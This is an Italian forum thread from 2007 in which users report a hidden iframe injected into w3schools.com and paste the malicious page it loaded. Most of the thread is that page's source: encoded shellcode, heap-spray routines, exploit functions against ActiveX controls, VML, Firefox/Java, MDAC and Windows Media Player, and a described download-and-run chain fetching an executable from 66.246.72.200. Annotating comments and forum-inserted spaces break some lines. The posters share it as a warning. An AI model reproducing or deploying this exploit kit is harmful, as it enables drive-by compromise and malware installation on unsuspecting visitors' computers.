
Visualizza la versione completa : www.w3schools.com "attaccato" [no tecnico]


Vincent.Zeno
08-09-2007, 19:04
... solo per chiacchiere

fate attenzione: hanno subito un'iniezione di un iframe nascosto:
<iframe src='http://66.246.72.200/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

come li si avvisa?

andrea.paiola
08-09-2007, 19:06
ma che stai dicendo? :D

ahhhh w3school

ecco il sorgente dell'iframe


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns:IE>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<IE:clientCaps ID="oClientCaps" /><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html xmlns:v="urn:schemas-microsoft-com:vml">

<head>
<script>
var isya = 1;
var isfl = 1;
var isya2 = 1;
var issdk = 1;
</script>
<object classid="clsid:201EA564-A6F6-11D1-811D-00C04FB6BD36" id="sdk" onerror="issdk=0;"></object>
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" onerror="isya2=0;" ></object>
<object classid="clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E" id="VMLRender" ></object>
<object classid="clsid:00000535-0000-0010-8000-00AA006D2EA4" id="obj" ></object>
<object classid="clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277" id="target" onerror="isya=0;"></object>
<OBJECT ID='WZFILEVIEW' WIDTH=1 HEIGHT=1 CLASSID='CLSID:A09AE68F-B14D-43ED-B713-BA413F034904'></OBJECT>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>

<body><div id='exp'></div>

<script language="javascript">



var up_code = String.fromCharCode(37,117,57,48,57,48,37,117,57,4 8,57,48,37,117,53,52,101,98,37,117,55,53,56,98,37, 117,56,98,51,99,37,117,51,53,55,52,37,117,48,51,55 ,56,37,117,53,54,102,53,37,117,55,54,56,98,37,117, 48,51,50,48,37,117,51,51,102,53,37,117,52,57,99,57 ,37,117,97,100,52,49,37,117,100,98,51,51,37,117,48 ,102,51,54,37,117,49,52,98,101,37,117,51,56,50,56, 37,117,55,52,102,50,37,117,99,49,48,56,37,117,48,1 00,99,98,37,117,100,97,48,51,37,117,101,98,52,48,3 7,117,51,98,101,102,37,117,55,53,100,102,37,117,53 ,101,101,55,37,117,53,101,56,98,37,117,48,51,50,52 ,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56 ,98,52,98,37,117,49,99,53,101,37,117,100,100,48,51 ,37,117,48,52,56,98,37,117,48,51,56,98,37,117,99,5 1,99,53,37,117,55,50,55,53,37,117,54,100,54,99,37, 117,54,101,54,102,37,117,54,52,50,101,37,117,54,99 ,54,99,37,117,52,51,48,48,37,117,53,99,51,97,37,11 7,50,101,53,53,37,117,55,56,54,53,37,117,48,48,54, 53,37,117,99,48,51,51,37,117,48,51,54,52,37,117,51 ,48,52,48,37,117,48,99,55,56,37,117,52,48,56,98,37 ,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,9 7,100,37,117,48,56,52,48,37,117,48,57,101,98,37,11 7,52,48,56,98,37,117,56,100,51,52,37,117,55,99,52, 48,37,117,52,48,56,98,37,117,57,53,51,99,37,117,56 ,101,98,102,37,117,48,101,52,101,37,117,101,56,101 ,99,37,117,102,102,56,52,37,117,102,102,102,102,37 ,117,101,99,56,51,37,117,56,51,48,52,37,117,50,52, 50,99,37,117,102,102,51,99,37,117,57,53,100,48,37, 117,98,102,53,48,37,117,49,97,51,54,37,117,55,48,5 0,102,37,117,54,102,101,56,37,117,102,102,102,102, 37,117,56,98,102,102,37,117,50,52,53,52,37,117,56, 100,102,99,37,117,98,97,53,50,37,117,100,98,51,51, 37,117,53,51,53,51,37,117,101,98,53,50,37,117,53,5 1,50,52,37,117,100,48,102,102,37,117,98,102,53,100 ,37,117,102,101,57,56,37,117,48,101,56,97,37,117,5 3,51,101,56,37,117,102,102,102,102,37,117,56,51,10 2,102,37,117,48,52,101,99,37,117,50,99,56,51,37,11 7,54,50,50,52,37,117,100,48,102,102,37,117,55,101, 
98,102,37,117,101,50,100,56,37,117,101,56,55,51,37 ,117,102,102,52,48,37,117,102,102,102,102,37,117,1 02,102,53,50,37,117,101,56,100,48,37,117,102,102,1 00,55,37,117,102,102,102,102,37,117,55,52,54,56,37 ,117,55,48,55,52,37,117,50,102,51,97,37,117,51,54, 50,102,37,117,50,101,51,54,37,117,51,52,51,50,37,1 17,50,101,51,54,37,117,51,50,51,55,37,117,51,50,50 ,101,37,117,51,48,51,48,37,117,54,53,50,102,37,117 ,54,53,55,56,37,117,55,48,50,101,37,117,55,48,54,5 6,37,117,48,48,48,48);
var keyStr = "ABCDEFGHIJKLMNOP" + "QRSTUVWXYZabcdef" + "ghijklmnopqrstuv" + "wxyz0123456789+/" + "=";
/**
 * Base64 decoder bundled with the page so that object and method names can be
 * shipped encoded and only turned into text at run time; other functions in
 * this script pass its result straight to eval(). A private Base64 routine
 * sitting next to eval() is a useful triage signal for obfuscated script.
 *
 * @param {string} input Base64 text; characters outside the alphabet are dropped.
 * @returns {string} Decoded string, one character per decoded byte.
 */
function decode64(input)
{
var output = "";
// Only chr3 and enc4 are initialised to ""; the other names are declared undefined.
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
// base64test is never read; the same pattern is repeated inline on the next line.
var base64test = /[^A-Za-z0-9\+\/\=]/g;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do
{
// Look up four input characters in the global keyStr table (6 bits each).
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
// Repack the four 6-bit values into three bytes.
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
// Index 64 is "=" in keyStr, i.e. padding: skip the bytes it stands for.
if (enc3 != 64)
{
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64)
{
output = output + String.fromCharCode(chr3);
}
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
}
while (i < input.length);
return output;
}

/**
 * Visitor fingerprinting: guesses the browser family from DOM quirks
 * (document.defaultCharset, document.characterSet, window.opera) rather than
 * trusting the user-agent string alone, so the page can pick which code path
 * to run. The user-agent is only used to extract a version substring.
 *
 * NOTE(review): the "w indow" tokens below are spaces inserted by the forum
 * software when the sample was pasted; as shown, those lines do not parse.
 *
 * @returns {string|undefined} "MSIE", "Opera", "Firefox", or the raw
 *   user-agent when productVersion is the empty string.
 */
function testBrowser()
{
// defaultCharset set and characterSet missing: treated as Internet Explorer.
if ( document.defaultCharset != '' && document.defaultCharset != undefined && document.characterSet == undefined && document.body)
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("MSIE")+5,3);
var browser = "MSIE";
}

// window.opera present: treated as Opera.
if (window.opera && document.defaultCharset == undefined && document.characterSet != "" && document.characterSet != undefined && self.innerHeight)
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Opera")+6,4);
var browser = "Opera";
}

// Neither of the above but characterSet present: treated as Firefox/Gecko.
if (document.defaultCharset == undefined && !window.opera && document.characterSet != "" && (self.innerHeight))
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Gecko")+6,8)+ ' ('+ window.navigator.userAgent.substr(8,3) + ')';
var browser = "Firefox";
}

// productVersion is an implicit global assigned only inside the branches above.
if (productVersion == "")
{
var browser = window.navigator.userAgent;
}
return browser;
}

/**
 * Visitor fingerprinting: maps navigator.appVersion to a short Windows
 * version tag, used by the driver code at the end of the script to choose a
 * code path per operating system.
 *
 * @returns {string|undefined} One of "95", "NT", "ME", "98", "SP2", "2K",
 *   "XP", "2K3"; undefined when the platform is not Win32 or nothing matches.
 */
function getVersion()
{
var osversion = "";
var osplatform = "";
osversion = navigator.appVersion;
osplatform = navigator.platform
if (osplatform.search("Win32") != -1)
{
// First match wins, so the 'SV1' test takes precedence over the NT 5.x tests.
if (osversion.indexOf('Windows 95') != -1) return "95"
else if (osversion.indexOf('Windows NT 4') != -1) return "NT"
else if (osversion.indexOf('Win 9x 4.9') != -1) return "ME"
else if (osversion.indexOf('Windows 98') != -1) return "98"
// presumably the IE user-agent token for XP SP2 — confirm
else if (osversion.indexOf('SV1') != -1) return "SP2"
else if (osversion.indexOf('Windows NT 5.0') != -1) return "2K"
else if (osversion.indexOf('Windows NT 5.1') != -1) return "XP"
else if (osversion.indexOf('Windows NT 5.2') != -1) return "2K3"
}
}

/**
 * Fills script memory with many large strings, each made of a repeated
 * two-character filler followed by the unescaped up_code blob. This is the
 * memory-preparation step the *_exploit functions call before touching a
 * plug-in or ActiveX object.
 *
 * Triage signals visible here: unescape() reached through
 * eval(String.fromCharCode(...)) instead of being called by name, string
 * doubling up to a fixed hex size, and an array of hundreds of identical
 * large strings.
 *
 * Writes the implicit globals up_memBlock, up_memSize, up_memDump,
 * up_memFill, up_tempBlock, up_myMemory and sets isMemory to true.
 */
function makeMemory()
{
var up_payLoad = unescape(up_code);
// The first char-code list spells "unescape"; the second is a %u-escaped filler pattern.
up_memBlock = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101))(String.fromCharCode(37,117,48,53,48,53,37,1 17,48,53,48,53));
up_memSize = 20;
up_memDump = up_memSize+up_payLoad.length;
// Double the filler until it is at least header + payload long.
while (up_memBlock.length<up_memDump)
{
up_memBlock+=up_memBlock;
}
up_memFill = up_memBlock.substring(0, up_memDump);
up_tempBlock = up_memBlock.substring(0, up_memBlock.length-up_memDump);
// Grow the filler block until block + payload reaches 0x40000 characters.
while(up_tempBlock.length+up_memDump<0x40000)
{
eval("up_tempBlock = up_tempBlock+up_tempBlock+up_memFill");
}
up_myMemory = new Array();
// 350 copies of filler + payload are kept alive in the array.
for (i=0;i<350;i++) up_myMemory[i] = eval("up_tempBlock + up_payLoad");
isMemory = true;
}

/**
 * Repeats a short string until it is long enough, then trims it to half of
 * the requested size in characters. Called by firefox1_exploit to build its
 * filler strings.
 *
 * NOTE(review): "OffsetSlideSiz e" below contains a space inserted by the
 * forum software; as shown, that line does not parse.
 *
 * @param {string} OffsetSlide Seed string to repeat.
 * @param {number} OffsetSlideSize Target size; the result is OffsetSlideSize/2 characters.
 * @returns {string} The repeated, trimmed string.
 */
function findOffset(OffsetSlide, OffsetSlideSize)
{
// Doubling loop: stop once twice the length reaches the target size.
while (OffsetSlide.length*2<OffsetSlideSize)
{
OffsetSlide+=OffsetSlide;
}
OffsetSlide=OffsetSlide.substring(0,OffsetSlideSiz e/2);
return OffsetSlide;
}

/**
 * Repeatedly evaluates two Base64-hidden statements against an ActiveX
 * object, swallowing every error, then schedules vml_exploit() as the next
 * attempt. The object and method names exist only in encoded form, so a
 * plain-text search of the page for them would find nothing; decoding the
 * literals is required to see what is instantiated.
 *
 * Triage signals: eval(decode64('...')) pairs, an empty catch block around
 * ActiveX use, and chaining to another attempt through setTimeout with a
 * string argument.
 */
function setslice_exploit()
{
if (isMemory == false ) makeMemory();
count = 129-1;
// The try block below is the whole loop body (no braces on the for).
for(i=0;i<count;i++)
try
{
// decode64 strips characters outside its alphabet, so the stray spaces in these literals are ignored.
var slice = eval(decode64('bmV3IEFjdGl2ZVhPYmplY3QoJ1dlYlZpZXd Gb2xkZXJJY29uLldlYlZpZXdGb2xkZXJJY29uLjEnKTs='));
eval(decode64('c2xpY2Uuc2V0U2xpY2UoMHg3ZmZmZmZmZSw gMHgwNTA1MDUwNSwgMHgwNTA1MDUwNSwweDA1MDUwNTA1ICk7' ));
}
catch(e){}
// interval is a global (3 in the driver code), so this fires after 1.5 s.
setTimeout("vml_exploit();",interval * 500);
}

andrea.paiola
08-09-2007, 19:12
/**
 * Builds a VML fragment (v:rect / v:recolorinfo with a very large numcolors
 * attribute and 44 recolorinfoentry children) and injects it into the #exp
 * div through innerHTML. The page head binds the v: namespace to the
 * VMLRender object, so the fragment is handed to the VML renderer.
 *
 * Triage signals: a v:recolorinfo element with an implausibly large
 * numcolors value, generated from script rather than present in the markup.
 */
function vml_exploit()
{
if (isMemory == false ) makeMemory();
myDiv = document.getElementById('exp');
exploit = "<v:rect style='width:120pt;height:80pt' fillcolor=\"red\" >";
exploit += "<v:recolorinfo recolorstate=\"t\" numcolors=\"97612895\">";
// The recolortype attribute below is missing its closing quote in the sample as posted.
for (i=0;i<44;i++) exploit += "<v:recolorinfoentry tocolor=\"rgb(1,1,1)\" recolortype=\"1285\ lbcolor=\"rgb(1,1,1)\" forecolor=\"rgb(1,1,1)\" backcolor=\"rgb(1,1,1)\" fromcolor=\"rgb(1,1,1)\" lbstyle =\"32\" bitmaptype=\"3\"/> " ;
exploit += "<v/recolorinfo>";
myDiv.innerHTML = exploit;
}

function firefox_exploit()
{

firefoxPay = unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 
7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
fill = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,39,37,117,48,56,48,48,39,41,59));
addr = 0x08000800;
b = fill;
while (b.length <= 0x400000) { b += b; }
var c = new Array();
for (var i =0; i <36 ; i++)
{
c[i] =
eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
eval(String.fromCharCode(98,46,115,117,98,115,116, 114,105,110,103))(0,0x100000 - firefoxPay.length) + firefoxPay +
b.substring(0, 0x100000 - firefoxPay.length) + firefoxPay;
}
if (window.navigator.javaEnabled)
{
window.navigator = (addr / 2);
try { java.lang.reflect.Runtime.newInstance(java.lang.Cl ass.forName(String.fromCharCode(106,97,118,97,46,1 08,97,110,103,46,82,117,110,116,105,109,101)), 0); }
catch(e){}
}
}

function firefox1_exploit()
{
location.href = String.fromCharCode(106,97,118,97,115,99,114,105,1 12,116,58,118,111,105,100,32,40,110,101,119,32,73, 110,115,116,97,108,108,86,101,114,115,105,111,110, 40,41,41,59);
up_heapOffset = 0x12000000;
mdacPay = unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 
,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
up_heapOffsetSize = 0x400000;
paySize = mdacPay.length * 2;
up_spraySize = up_heapOffsetSize-(paySize+0x38);
up_sprayOffset1 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,48,48,50,67,37,117,49,49,67,48,3 4,41,59));
up_sprayOffset1 = findOffset(up_sprayOffset1,up_spraySize);
up_sprayOffset2 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,48,48,50,67,37,117,49,50,48,48,3 4,41,59));
up_sprayOffset2 = findOffset(up_sprayOffset2,up_spraySize);
up_sprayOffset3 = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,3 4,41,59));
up_sprayOffset3 = findOffset(up_sprayOffset3,up_spraySize);
heapOffsetB = (up_heapOffset-0x400000)/up_heapOffsetSize;
newMem = new Array();
for (i=0;i<heapOffsetB;i++)
{
newMem[i]=(i%3==0) ? up_sprayOffset1 + mdacPay: (i%3==1) ? up_sprayOffset2 + mdacPay: up_sprayOffset3 + mdacPay;
}
eval(String.fromCharCode(117,112,95,111,102,102,11 5,101,116,32,61,32,48,120,49,49,56,48,48,48,50,67, 59));
eval(String.fromCharCode(40,110,101,119,32,73,110, 115,116,97,108,108,86,101,114,115,105,111,110,41,4 6,99,111,109,112,97,114,101,84,111,40,110,101,119, 32,78,117,109,98,101,114,40,117,112,95,111,102,102 ,115,101,116,32,62,62,32,49,41,41,59));
}

function wmplayer_exploit()
{
s = unescape( String.fromCharCode(37,117,52,49,52,49,37,117,52,4 9,52,49,37,117,52,49,52,49,37,117,52,49,52,49,37,1 17,52,49,52,49,37,117,52,49,52,49,37,117,52,49,52, 49,37,117,52,49,52,49) );
do { s+=s; } while(s.length<0x0900000);s+= unescape(String.fromCharCode(37,117,57,48,57,48,37 ,117,57,48,57,48,37,117,53,52,101,98,37,117,55,53, 56,98,37,117,56,98,51,99,37,117,51,53,55,52,37,117 ,48,51,55,56,37,117,53,54,102,53,37,117,55,54,56,9 8,37,117,48,51,50,48,37,117,51,51,102,53,37,117,52 ,57,99,57,37,117,97,100,52,49,37,117,100,98,51,51, 37,117,48,102,51,54,37,117,49,52,98,101,37,117,51, 56,50,56,37,117,55,52,102,50,37,117,99,49,48,56,37 ,117,48,100,99,98,37,117,100,97,48,51,37,117,101,9 8,52,48,37,117,51,98,101,102,37,117,55,53,100,102, 37,117,53,101,101,55,37,117,53,101,56,98,37,117,48 ,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98, 37,117,56,98,52,98,37,117,49,99,53,101,37,117,100, 100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37 ,117,99,51,99,53,37,117,55,50,55,53,37,117,54,100, 54,99,37,117,54,101,54,102,37,117,54,52,50,101,37, 117,54,99,54,99,37,117,52,51,48,48,37,117,53,99,51 ,97,37,117,50,101,53,53,37,117,55,56,54,53,37,117, 48,48,54,53,37,117,99,48,51,51,37,117,48,51,54,52, 37,117,51,48,52,48,37,117,48,99,55,56,37,117,52,48 ,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,11 7,56,98,97,100,37,117,48,56,52,48,37,117,48,57,101 ,98,37,117,52,48,56,98,37,117,56,100,51,52,37,117, 55,99,52,48,37,117,52,48,56,98,37,117,57,53,51,99, 37,117,56,101,98,102,37,117,48,101,52,101,37,117,1 01,56,101,99,37,117,102,102,56,52,37,117,102,102,1 02,102,37,117,101,99,56,51,37,117,56,51,48,52,37,1 17,50,52,50,99,37,117,102,102,51,99,37,117,57,53,1 00,48,37,117,98,102,53,48,37,117,49,97,51,54,37,11 7,55,48,50,102,37,117,54,102,101,56,37,117,102,102 ,102,102,37,117,56,98,102,102,37,117,50,52,53,52,3 7,117,56,100,102,99,37,117,98,97,53,50,37,117,100, 98,51,51,37,117,53,51,53,51,37,117,101,98,53,50,37 ,117,53,51,50,52,37,117,100,48,102,102,37,117,98,1 02,53,100,37,117,102,101,57,56,37,117,48,101,56,97 ,37,117,53,51,101,56,37,117,102,102,102,102,37,117 ,56,51,102,102,37,117,48,52,101,99,37,117,50,99,56 ,51,37,117,54,50,50,52,37,117,100,48,102,102,37,11 
7,55,101,98,102,37,117,101,50,100,56,37,117,101,56 ,55,51,37,117,102,102,52,48,37,117,102,102,102,102 ,37,117,102,102,53,50,37,117,101,56,100,48,37,117, 102,102,100,55,37,117,102,102,102,102,37,117,55,52 ,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,1 17,51,54,50,102,37,117,50,101,51,54,37,117,51,52,5 1,50,37,117,50,101,51,54,37,117,51,50,51,55,37,117 ,51,50,50,101,37,117,51,48,51,48,37,117,54,53,50,1 02,37,117,54,53,55,56,37,117,55,48,50,101,37,117,5 5,48,54,56,37,117,48,48,48,48));
myDiv = document.getElementById('exp');
exploit='<E'+'MB'+'ED S'+'R'+'C="---------------------'+'--------------------------'+'------------'+'-------'+'-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------'+'---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKK'+'KKLLL LAAANNN'+'NOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVW'+'WW WXXXXYYYYZZZZ0000111122223333'+'444455556666777788 889999.wmv"></EM'+'BED>';
myDiv.innerHTML = exploit;
}

Vincent.Zeno
08-09-2007, 19:13
:confused: e che roba ?

NOD 32 me lo ferma come Trojan

fred84
08-09-2007, 19:13
e meno male che non era tecnico..... :stordita:

andrea.paiola
08-09-2007, 19:14
/**
 * Assigns a 1044-character string of 0x0A bytes to the SourceUrl property of
 * the object with id "sdk" (declared by classid in the page head), then
 * reloads the page.
 *
 * Triage signal: an over-long, single-byte-repeated value written to a
 * URL-typed property of an embedded ActiveX object.
 */
function sdk_exploit()
{
if (isMemory == false ) makeMemory();
var tmp = "\x0A\x0A\x0A\x0A";
var tmp_size = 1044;
// Double until long enough, then trim to exactly tmp_size characters.
while(tmp.length < (tmp_size * 2)) tmp += tmp;
tmp = tmp.substring(0, tmp_size);
sdk.SourceUrl = tmp;
location.reload();
}


/**
 * Creates an object element for the classid below, builds a buffer of more
 * than 5000 0x0A characters, and uses eval() on assembled strings to assign
 * that buffer to a property of the object and then call a method on it.
 * The property and method names are split between a char-code list and a
 * string literal so they never appear whole in the source.
 *
 * Triage signals: the classid string, and eval() of a statement stitched
 * together from String.fromCharCode and literal fragments.
 */
function yahoo_exploit()
{
if (isMemory == false ) makeMemory();
// This local shadows the page-level object whose id is also "target".
var target = document.createElement("object");
target.setAttribute("classid", "clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277");
myBuff = '\x0a';
while (myBuff.length < 5000) myBuff += '\x0a\x0a\x0a\x0a';
eval(String.fromCharCode(116,97,114,103,101,116,46 ,115,101,114)+"ver = myBuff;");
eval("target"+"."+String.fromCharCode(114,101,99,101,105,118,101,40 ,41)+";");

}


/**
 * Creates an object element for the classid below and builds a 1000-character
 * buffer, but never hands the buffer to the object: the final eval() is called
 * with no argument, so the statement that used it is absent from the sample
 * as posted.
 *
 * Triage signal: the classid string paired with a long repeated-byte buffer.
 */
function yahoo2_exploit()
{
if (isMemory == false ) makeMemory();

var target1 = document.createElement("object");
target1.setAttribute("classid", "CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD");
// Note "%0a0a" (no 'u'): this decodes to a newline followed by the text "0a".
var buffer = unescape("%0a0a");
while (buffer.length < 845) buffer+='\x0A';
while (buffer.length< 1000) buffer+=unescape("%u0a0a");
// eval() with no argument evaluates nothing.
eval();

}

/**
 * Builds a 512-character buffer ("A" followed by 0x09 bytes) and evaluates a
 * char-code-encoded statement. The first characters of that list spell
 * WZFILEVIEW, the id of the object embedded in the page head, and the list
 * ends with "(buf);", so the statement is a method call on that object with
 * the buffer as argument.
 *
 * NOTE(review): several numbers in the list are split by spaces inserted by
 * the forum software; as shown, the line does not parse.
 */
function winzip_exploit()
{
if (isMemory == false ) makeMemory();
var buf = String.fromCharCode(65);
while (buf.length < 512) buf+='\x09';
eval(String.fromCharCode(87,90,70,73,76,69,86,73,6 9,87,46,67,114,101,97,116,101,78,101,119,70,111,10 8,100,101,114,70,114,111,109,78,97,109,101,40,98,1 17,102,41,59));
}



/**
 * Download-and-run path selected by the driver code for Internet Explorer on
 * Windows 2000. It assembles a script that fetches a file over HTTP with an
 * XMLHTTP object, writes the response to disk through ADODB.Stream, and
 * starts it via Shell.Application, then navigates the document to a res://
 * URL that carries that script URL-encoded in its fragment.
 *
 * Indicators visible in this block:
 *   - network: http://66.246.72.200/exe.php
 *   - file:    ../U.exe (relative to the process working directory)
 *   - URL:     res://mmcndmgr.dll/... with encoded <script> in the fragment
 *
 * Every sensitive name ("ActiveXObject", "Microsoft.XMLHTTP", "ADODB.Stream",
 * "Shell.Application", "ShellExecute") is split across concatenated string
 * fragments, so signatures matching the whole word will miss it.
 */
function w2k_exploit()
{
